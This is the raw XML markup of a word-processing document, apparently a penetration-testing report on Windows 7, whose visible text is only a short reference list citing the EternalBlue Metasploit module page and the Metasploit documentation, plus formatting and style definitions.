    <w:p w14:paraId="5C3AE736" w14:textId="77777777" w:rsidR="007F4E0B" w:rsidRPr="00DC3DEF" w:rsidRDefault="007F4E0B" w:rsidP="00162FB3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="10"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc175499470"/>
      <w:r w:rsidRPr="00DC3DEF">
        <w:t>References</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="5AC4E91E" w14:textId="77B6A7DF" w:rsidR="007F4E0B" w:rsidRPr="00DC3DEF" w:rsidRDefault="00000000" w:rsidP="007F4E0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidR="00840D82" w:rsidRPr="00DC3DEF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00840D82" w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F301052" w14:textId="5C061026" w:rsidR="007F4E0B" w:rsidRPr="00DC3DEF" w:rsidRDefault="007F4E0B" w:rsidP="007F4E0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metasploit Documentation</w:t>
      </w:r>
      <w:r w:rsidR="00DC3DEF" w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00840D82" w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidR="00840D82" w:rsidRPr="00DC3DEF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://docs.metasploit.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00840D82" w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EEED43" w14:textId="77777777" w:rsidR="007F4E0B" w:rsidRPr="00DC3DEF" w:rsidRDefault="007F4E0B" w:rsidP="007F4E0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC3DEF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Industry standards for penetration testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3085C14D" w14:textId="2832A85C" w:rsidR="00B20E9C" w:rsidRPr="00DC3DEF" w:rsidRDefault="00B20E9C">
      <w:pPr>
        <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
        <w:ind w:left="371" w:hanging="10"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00B20E9C" w:rsidRPr="00DC3DEF" w:rsidSect="002B6769">
      <w:headerReference w:type="default" r:id="rId21"/>
      <w:footerReference w:type="default" r:id="rId22"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1440" w:right="1772" w:bottom="1440" w:left="141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576CCE" w14:textId="77777777" w:rsidR="003667C5" w:rsidRDefault="003667C5">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="557CDEC9" w14:textId="77777777" w:rsidR="003667C5" w:rsidRDefault="00366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807FA" w14:textId="10D9AEFE" w:rsidR="00162FB3" w:rsidRDefault="00162FB3" w:rsidP="00162FB3">
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9082"/>
      </w:tabs>
      <w:spacing w:after="0"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wpg">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="70BA8BE5" wp14:editId="3F95B246">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>899998</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>9617393</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="5759996" cy="5055"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapSquare wrapText="bothSides"/>
              <wp:docPr id="296465991" name="Group 29646599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956219678"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AAAC69" id="Group 296465991" o:spid="_x0000_s1026" style="position:absolute;margin-left:70.85pt;margin-top:757.3pt;width:453.55pt;height:.4pt;z-index:251661312;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordsize="57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">
              <v:shape id="Shape 704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" path="m,l5759996,e" filled="f" strokeweight=".14042mm">
                <v:stroke miterlimit="83231f" joinstyle="miter"/>
                <v:path arrowok="t" textboxrect="0,0,5759996,0"/>
              </v:shape>
              <w10:wrap type="square" anchorx="page" anchory="page"/>
            </v:group>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r>
      <w:t xml:space="preserve">                                             </w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="02B6CB67" w14:textId="464B3F2D" w:rsidR="00162FB3" w:rsidRPr="00807B69" w:rsidRDefault="00162FB3" w:rsidP="00162FB3">
    <w:pPr>
      <w:rPr>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve">    </w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="39A5F021" w14:textId="77777777" w:rsidR="00162FB3" w:rsidRPr="00807B69" w:rsidRDefault="00162FB3" w:rsidP="00162FB3">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
    <w:r>
      <w:t xml:space="preserve">                                             </w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="2DFA074C" w14:textId="77777777" w:rsidR="00162FB3" w:rsidRDefault="00162FB3" w:rsidP="00162FB3">
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9082"/>
      </w:tabs>
      <w:spacing w:after="0"/>
    </w:pPr>
  </w:p>
  <w:p w14:paraId="09553195" w14:textId="4FC36A7A" w:rsidR="008872A2" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
    <w:hyperlink r:id="rId1" w:history="1">
      <w:r w:rsidR="00162FB3" w:rsidRPr="00497EED">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t>skdas5405@gmail.com</w:t>
      </w:r>
    </w:hyperlink>
  </w:p>
  <w:p w14:paraId="1D3303CA" w14:textId="7BA68C7F" w:rsidR="00B20E9C" w:rsidRDefault="00B20E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1FC1C" w14:textId="77777777" w:rsidR="003667C5" w:rsidRDefault="003667C5">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5D8664DA" w14:textId="77777777" w:rsidR="003667C5" w:rsidRDefault="003667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2406F" w14:textId="35DC9DF2" w:rsidR="00DC3DEF" w:rsidRPr="00F90591" w:rsidRDefault="00000000" w:rsidP="00DC3DEF">
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9082"/>
      </w:tabs>
      <w:spacing w:after="0"/>
      <w:rPr>
        <w:u w:val="single" w:color="000000"/>
      </w:rPr>
    </w:pPr>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:u w:val="single" w:color="000000"/>
        </w:rPr>
        <w:id w:val="704218814"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Page Numbers (Margins)"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:r w:rsidR="00DC3DEF" w:rsidRPr="00CB3D90">
          <w:rPr>
            <w:noProof/>
            <w:u w:val="single" w:color="000000"/>
          </w:rPr>
          <mc:AlternateContent>
            <mc:Choice Requires="wps">
              <w:drawing>
                <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="301D1767" wp14:editId="6717A7A0">
                  <wp:simplePos x="0" y="0"/>
                  <wp:positionH relativeFrom="rightMargin">
                    <wp:align>center</wp:align>
                  </wp:positionH>
                  <wp:positionV relativeFrom="margin">
                    <wp:align>bottom</wp:align>
                  </wp:positionV>
                  <wp:extent cx="510540" cy="2183130"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="0"/>
                  <wp:wrapNone/>
                  <wp:docPr id="55604438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4257A" w14:textId="77777777" w:rsidR="00DC3DEF" w:rsidRDefault="00DC3DEF" w:rsidP="00DC3DE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01D1767" id="Rectangle 22" o:spid="_x0000_s1034"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1A14257A" w14:textId="77777777" w:rsidR="00DC3DEF" w:rsidRDefault="00DC3DEF" w:rsidP="00DC3DE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162FB3" w:rsidRPr="00162FB3">
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r w:rsidR="00162FB3" w:rsidRPr="00162FB3">
      <w:rPr>
        <w:u w:val="single" w:color="000000"/>
      </w:rPr>
      <w:t>Windows 7 Professional Vulnerability Assessment and Exploitation</w:t>
    </w:r>
    <w:r w:rsidR="00DC3DEF">
      <w:rPr>
        <w:u w:val="single" w:color="000000"/>
      </w:rPr>
      <w:tab/>
      <w:t>2024-08-23</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="712E8397" w14:textId="77777777" w:rsidR="00DC3DEF" w:rsidRDefault="00DC3DEF" w:rsidP="00DC3DEF"/>
  <w:p w14:paraId="207B2A93" w14:textId="77777777" w:rsidR="00DC3DEF" w:rsidRPr="008B45F9" w:rsidRDefault="00DC3DEF" w:rsidP="00DC3DEF">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
  </w:p>
  <w:p w14:paraId="24978DD1" w14:textId="77777777" w:rsidR="00DC3DEF" w:rsidRDefault="00DC3D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D305F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CBDA22B4"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Heading1"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        <w:b/>
        <w:bCs/>
        <w:i w:val="0"/>
        <w:strike w:val="0"/>
        <w:dstrike w:val="0"/>
        <w:color w:val="000000"/>
        <w:sz w:val="41"/>
        <w:szCs w:val="41"/>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2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="108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3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="180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4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="252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5">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="324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6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="396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7">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="468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8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="540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abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="05BC1C01"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F43C2EF2"/>
    <w:lvl w:ilvl="0" w:tplc="53E878E2">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2EE1738">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="14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B5CDC94">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2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08EE24">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2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2432B0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3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AA8B44">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4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2C71D4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5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222F18">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5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9C80E18">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6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FBF33C0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AC6E97C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2D226C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7F8CC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735C06"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3A4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EB244B0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9A4A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ED0820"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D824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F25950"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="428076E4"/>
    <w:lvl w:ilvl="0" w:tplc="752820EC">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10790E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1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50961E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2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7D6C458">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2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B2F7F2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3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868DEE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4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CE24AA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="50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2C6BD0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="57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BA5312">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="64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E9030CE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7098FB18"/>
    <w:lvl w:ilvl="0" w:tplc="BC64BF74">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2628" w:hanging="408"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="40090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3300" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="4009001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4020" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="4009000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4740" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="40090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5460" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="4009001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6180" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="4009000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6900" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="40090019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7620" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="4009001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="8340" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="1613396612">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="2006589824">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1335231169">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1223296912">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="2141455296">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1593203309">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="336544570">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="655569542">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="200962726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E9C"/>
    <w:rsid w:val="00033291"/>
    <w:rsid w:val="0005029C"/>
    <w:rsid w:val="00117E9C"/>
    <w:rsid w:val="00162FB3"/>
    <w:rsid w:val="00233899"/>
    <w:rsid w:val="002A557D"/>
    <w:rsid w:val="002B2ED5"/>
    <w:rsid w:val="002B6769"/>
    <w:rsid w:val="00364EFA"/>
    <w:rsid w:val="003667C5"/>
    <w:rsid w:val="00371F36"/>
    <w:rsid w:val="005C647A"/>
    <w:rsid w:val="00642D77"/>
    <w:rsid w:val="006669DA"/>
    <w:rsid w:val="006A7B84"/>
    <w:rsid w:val="006C16A7"/>
    <w:rsid w:val="00776E5B"/>
    <w:rsid w:val="007B4B4B"/>
    <w:rsid w:val="007F4E0B"/>
    <w:rsid w:val="00836470"/>
    <w:rsid w:val="00840D82"/>
    <w:rsid w:val="00885809"/>
    <w:rsid w:val="008872A2"/>
    <w:rsid w:val="008D00B1"/>
    <w:rsid w:val="008E53CD"/>
    <w:rsid w:val="0097031E"/>
    <w:rsid w:val="00A7217F"/>
    <w:rsid w:val="00B20E9C"/>
    <w:rsid w:val="00BB638E"/>
    <w:rsid w:val="00CD3CBE"/>
    <w:rsid w:val="00CF0470"/>
    <w:rsid w:val="00D41953"/>
    <w:rsid w:val="00DC3DEF"/>
    <w:rsid w:val="00E96207"/>
    <w:rsid w:val="00EB58C9"/>
    <w:rsid w:val="00EF75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99D4C"/>
  <w15:docId w15:val="{6121ED9C-03ED-44E6-9E1C-13349391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3"/>
      </w:numPr>
      <w:spacing w:after="470" w:line="265" w:lineRule="auto"/>
      <w:ind w:left="10" w:hanging="10"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="41"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00A7217F"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="323"/>
      <w:ind w:left="18"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:b/>
      <w:color w:val="282828"/>
      <w:sz w:val="29"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="007F4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A7217F"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:b/>
      <w:color w:val="282828"/>
      <w:sz w:val="29"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:link w:val="Heading1"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="41"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:hidden/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:spacing w:after="43" w:line="265" w:lineRule="auto"/>
      <w:ind w:left="29" w:right="23" w:hanging="10"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:b/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:hidden/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:spacing w:after="243" w:line="293" w:lineRule="auto"/>
      <w:ind w:left="269" w:right="15" w:hanging="10"/>
      <w:jc w:val="center"/>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872A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8872A2"/>
    <w:rPr>
      <w:rFonts w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="007F4E0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85809"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00840D82"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00840D82"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DC3D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DEF"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00162FB3"/>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3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00162FB3"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>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73384">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
